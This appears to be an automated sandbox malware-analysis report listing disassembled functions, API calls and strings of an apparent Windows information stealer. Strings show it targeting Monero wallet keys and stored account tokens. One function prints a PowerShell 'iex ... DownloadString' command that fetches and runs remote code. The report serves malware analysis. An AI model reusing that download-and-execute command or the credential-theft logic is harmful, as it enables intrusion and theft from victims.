                            • Opcode Fuzzy Hash: 603a2af2d1c77c3e27f4869d44ceee5961ec7316f32a7f6d7182b7387d59c8c6
                            • Instruction Fuzzy Hash: AE21EFB1D44259ABDB00DFD4DC49FAEBB78FB44B10F108519F619BB280D7786901CBA5
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                              • Part of subcall function 005647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                            • InternetOpenA.WININET(00580DF7,00000001,00000000,00000000,00000000), ref: 0056610F
                            • StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00566147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0056618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005661B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 005661DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0056620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00566249
                            • InternetCloseHandle.WININET(?), ref: 00566253
                            • InternetCloseHandle.WININET(00000000), ref: 00566260
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 869b1b56c31be48adeca8e2bf3db97c536b438016efdd74cc0996d074149d66c
                            • Instruction ID: 9db64f930f92f3c62a5f4f49ab5341ce3a978954fbd319d657f337ee0f22cffe
                            • Opcode Fuzzy Hash: 869b1b56c31be48adeca8e2bf3db97c536b438016efdd74cc0996d074149d66c
                            • Instruction Fuzzy Hash: DB5163B1900218ABDB20DF50DC59BEE7BB8FB85701F108098B609A71C1DB756A89CF96
                            APIs
                            • memset.MSVCRT ref: 005740D5
                            • RegOpenKeyExA.ADVAPI32(80000001,00E4D6C0,00000000,00020119,?), ref: 005740F4
                            • RegQueryValueExA.ADVAPI32(?,00E4E278,00000000,00000000,00000000,000000FF), ref: 00574118
                            • RegCloseKey.ADVAPI32(?), ref: 00574122
                            • lstrcat.KERNEL32(?,00000000), ref: 00574147
                            • lstrcat.KERNEL32(?,00E4E3F8), ref: 0057415B
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID: x
                            • API String ID: 2623679115-2890206012
                            • Opcode ID: 095c2c8507f64b2b14aa66efc8287c18db731cc93884c4d332bc05d29367cc30
                            • Instruction ID: d2459a279197c7e4f2b8d23eca3c49a920b8a1993f9dc66a7d8d8e07237a8b02
                            • Opcode Fuzzy Hash: 095c2c8507f64b2b14aa66efc8287c18db731cc93884c4d332bc05d29367cc30
                            • Instruction Fuzzy Hash: 814187B69001087BDB14EBA0EC4AFFE773DB7D9300F04C959B61A57181EA755B88CB92
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0056BC9F
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0056BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0056BDA5
                            • lstrlen.KERNEL32(00000000), ref: 0056BDB9
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 3cae5295e5ad23f81512f660f862678d8fe9dc580c85fb860afbc0ec5a2fbe2a
                            • Instruction ID: 25279bd69ea375c8fd29b05173a476c3d7cc291f8fae0513ba2b2a032175d6b0
                            • Opcode Fuzzy Hash: 3cae5295e5ad23f81512f660f862678d8fe9dc580c85fb860afbc0ec5a2fbe2a
                            • Instruction Fuzzy Hash: 16B11371910105ABDB04FBA0ED5AEEE7B3CBFD4300F408558F50AA7091EF346A59DB66
                            APIs
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 6eb36be2f593020e9f1712c6631be9e4f3c457970e739f9da3d08613f229b99b
                            • Instruction ID: d8823564143bfb8b7464b6e0fc92d0cd12a97481d3782157391c37d75159822d
                            • Opcode Fuzzy Hash: 6eb36be2f593020e9f1712c6631be9e4f3c457970e739f9da3d08613f229b99b
                            • Instruction Fuzzy Hash: E9F05E3290421AFFD3849FE0E90977D7B70FB46703F048198E60986290D7784F41EB9A
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00564FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00564FD1
                            • InternetOpenA.WININET(00580DDF,00000000,00000000,00000000,00000000), ref: 00564FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00565011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00565041
                            • InternetCloseHandle.WININET(?), ref: 005650B9
                            • InternetCloseHandle.WININET(?), ref: 005650C6
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 12729e104061d239631c165b799f3eaa21314c1ef1cf1a56880e2f5105a2399d
                            • Instruction ID: 827423e218f0f4630e4e54dcac8ecb4a2dfd5b50649fea14cdad27d921fef26d
                            • Opcode Fuzzy Hash: 12729e104061d239631c165b799f3eaa21314c1ef1cf1a56880e2f5105a2399d
                            • Instruction Fuzzy Hash: 1F31FAB4A40218ABDB20CF54DC89BDDB7B4FB48704F5081D9EA09A7281D7746AC5CF99
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00578426
                            • wsprintfA.USER32 ref: 00578459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0057847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0057848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00578499
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,00E4DF78,00000000,000F003F,?,00000400), ref: 005784EC
                            • lstrlen.KERNEL32(?), ref: 00578501
                            • RegQueryValueExA.ADVAPI32(00000000,00E4E110,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00580B34), ref: 00578599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00578608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0057861A
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 0f74d2c99e9fb5e0d79a2920ecc8b27c56280adbc7b4163e0b1ac72aab1c60f3
                            • Instruction ID: 1501ee387fcaa821ac314ea89b9e6281a887c4c182b26123f8c47be931985d37
                            • Opcode Fuzzy Hash: 0f74d2c99e9fb5e0d79a2920ecc8b27c56280adbc7b4163e0b1ac72aab1c60f3
                            • Instruction Fuzzy Hash: A921E97195021CABDB64DB54DC85FE9B7B8FB88700F00C5D8E609A6180DF756A85CFD4
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005776A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005776AB
                            • RegOpenKeyExA.ADVAPI32(80000002,00E3C470,00000000,00020119,00000000), ref: 005776DD
                            • RegQueryValueExA.ADVAPI32(00000000,00E4DF60,00000000,00000000,?,000000FF), ref: 005776FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00577708
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: ab9e54505057cf498ddbf3a75c7a907ca56dd556cc0eac82d6eafce628e623e8
                            • Instruction ID: d6de44da7b5bd71f261e53011aeeb92ed916f6a940696b7ae94ffa200b4f6877
                            • Opcode Fuzzy Hash: ab9e54505057cf498ddbf3a75c7a907ca56dd556cc0eac82d6eafce628e623e8
                            • Instruction Fuzzy Hash: 66014FB5A04308BBDB04DBE4EC49F6EBBB8EB89701F10C454FA0597290D7789904DB55
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0057773B
                            • RegOpenKeyExA.ADVAPI32(80000002,00E3C470,00000000,00020119,005776B9), ref: 0057775B
                            • RegQueryValueExA.ADVAPI32(005776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0057777A
                            • RegCloseKey.ADVAPI32(005776B9), ref: 00577784
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 482e79c808f56633015848a059f457209663a1e683d836400126319254931199
                            • Instruction ID: b20e77ec38dd650415be314d83583786af60fa3b335df2dfa4d43f950cfe582a
                            • Opcode Fuzzy Hash: 482e79c808f56633015848a059f457209663a1e683d836400126319254931199
                            • Instruction Fuzzy Hash: DF0144B5A40308BBDB00DBE0DC49FBEB7B8EB88701F008154FA05A7281D7785500CB55
                            APIs
                            • CreateFileA.KERNEL32(:W,80000000,00000003,00000000,00000003,00000080,00000000,?,00573AEE,?), ref: 005792FC
                            • GetFileSizeEx.KERNEL32(000000FF,:W), ref: 00579319
                            • CloseHandle.KERNEL32(000000FF), ref: 00579327
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :W$:W
                            • API String ID: 1378416451-2238429168
                            • Opcode ID: 489e7cc30001d401db2a31fa69466b89de9ded739333317e31eca5eff7ba45c5
                            • Instruction ID: 748e62062b24f8c1882492f54cad2ebcdc53cad73947bcdd5e0e83760f84f621
                            • Opcode Fuzzy Hash: 489e7cc30001d401db2a31fa69466b89de9ded739333317e31eca5eff7ba45c5
                            • Instruction Fuzzy Hash: D3F08C74E40208BBDB10DBB0EC08BAE7BB9FB88310F10CA54B615A72C0D6789600DB54
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                            • LocalFree.KERNEL32(0056148F), ref: 00569A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 9b426f6cb016dbe81a44b26bbdfdbcef63039a1ac152e5c291743b09076e24f7
                            • Instruction ID: f098adb43e2c2394f43525629f0e1cd039356f60627a326e3637f31a5c857b0f
                            • Opcode Fuzzy Hash: 9b426f6cb016dbe81a44b26bbdfdbcef63039a1ac152e5c291743b09076e24f7
                            • Instruction Fuzzy Hash: 73311C74A00209EFDB14CF94D985BAE7BF9FF89340F108158E915A7390D778A941CFA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: 07c0a9db2ea9926086bab15463b0ceb92192cf0a92e03949c4f7f05abf0d51fe
                            • Instruction ID: d588525a48b904c0a905c184408ffb82b466ffee88b7488bae5254f5710f12cc
                            • Opcode Fuzzy Hash: 07c0a9db2ea9926086bab15463b0ceb92192cf0a92e03949c4f7f05abf0d51fe
                            • Instruction Fuzzy Hash: 2241E7B110075C5EDB218B249C84BFB7FF9AF45704F1484ECEA8E86182D271AA44AF60
                            APIs
                            • lstrcat.KERNEL32(?,00E4E2C0), ref: 005747DB
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00574801
                            • lstrcat.KERNEL32(?,?), ref: 00574820
                            • lstrcat.KERNEL32(?,?), ref: 00574834
                            • lstrcat.KERNEL32(?,00E3B9A0), ref: 00574847
                            • lstrcat.KERNEL32(?,?), ref: 0057485B
                            • lstrcat.KERNEL32(?,00E4D9A0), ref: 0057486F
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 00578D90: GetFileAttributesA.KERNEL32(00000000,?,00561B54,?,?,0058564C,?,?,00580E1F), ref: 00578D9F
                              • Part of subcall function 00574570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00574580
                              • Part of subcall function 00574570: RtlAllocateHeap.NTDLL(00000000), ref: 00574587
                              • Part of subcall function 00574570: wsprintfA.USER32 ref: 005745A6
                              • Part of subcall function 00574570: FindFirstFileA.KERNEL32(?,?), ref: 005745BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: ad8544512d62f749f8b208a6fde2cdeb4f83121f79d7489acafedede05110d55
                            • Instruction ID: a12b0f175bda02185f217538f7a11e1e6423cf48f73b53b50cd02a6b2d4116a4
                            • Opcode Fuzzy Hash: ad8544512d62f749f8b208a6fde2cdeb4f83121f79d7489acafedede05110d55
                            • Instruction Fuzzy Hash: 9C3161B294020967CB51FBB0EC8DEE97778BBD8700F408589B31996081EF789689DF95
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00572D85
                            Strings
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00572D04
                            • ')", xrefs: 00572CB3
                            • <, xrefs: 00572D39
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00572CC4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: c35eb937ceedfdc1795b13f083efd8774ef5125900a5cc7df24ab1503c6feaa4
                            • Instruction ID: 191110d0c8d449fa2578fcd5a5dd1a5a97af0de836e583ec210c45abfa0a7446
                            • Opcode Fuzzy Hash: c35eb937ceedfdc1795b13f083efd8774ef5125900a5cc7df24ab1503c6feaa4
                            • Instruction Fuzzy Hash: 7141A171C101099ADB14FBA0D899FEEBF78BF94300F408119E51AB6191DF746A4ADF92
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00569F41
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: ed12a362f9152a83a5ac3ac219d153b0eade6979807be597f2f288581af2e0ac
                            • Instruction ID: 573049408416ba8c64ed266b4c86d7adf00c23492f959ee8e65a8badb209a5a6
                            • Opcode Fuzzy Hash: ed12a362f9152a83a5ac3ac219d153b0eade6979807be597f2f288581af2e0ac
                            • Instruction Fuzzy Hash: 3B613271A10249EBDB18EFA4DC99FED7B75BF84304F008418F90A6B191DB746A05CB52
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • memset.MSVCRT ref: 0057716A
                            Strings
                            • sW, xrefs: 00577111
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0057718C
                            • sW, xrefs: 005772AE, 00577179, 0057717C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemset
                            • String ID: sW$sW$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 4047604823-4082360348
                            • Opcode ID: 5dcf2b5ce9a02a410ec66b319f73bcc4e981ce46157f1df117b5282bd7ad5a6c
                            • Instruction ID: 9e9d8d961b6cabc8f00beecb9a83a26ee8a7d44c2b7360cdaf1f75f846619026
                            • Opcode Fuzzy Hash: 5dcf2b5ce9a02a410ec66b319f73bcc4e981ce46157f1df117b5282bd7ad5a6c
                            • Instruction Fuzzy Hash: D451A3B0C0421D9BDB14EB90EC55BEEBB74BF88304F5084A8E51977182EB742E88DF55
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00577E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,00E3C278,00000000,00020119,?), ref: 00577E5E
                            • RegQueryValueExA.ADVAPI32(?,00E4D7A0,00000000,00000000,000000FF,000000FF), ref: 00577E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00577E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
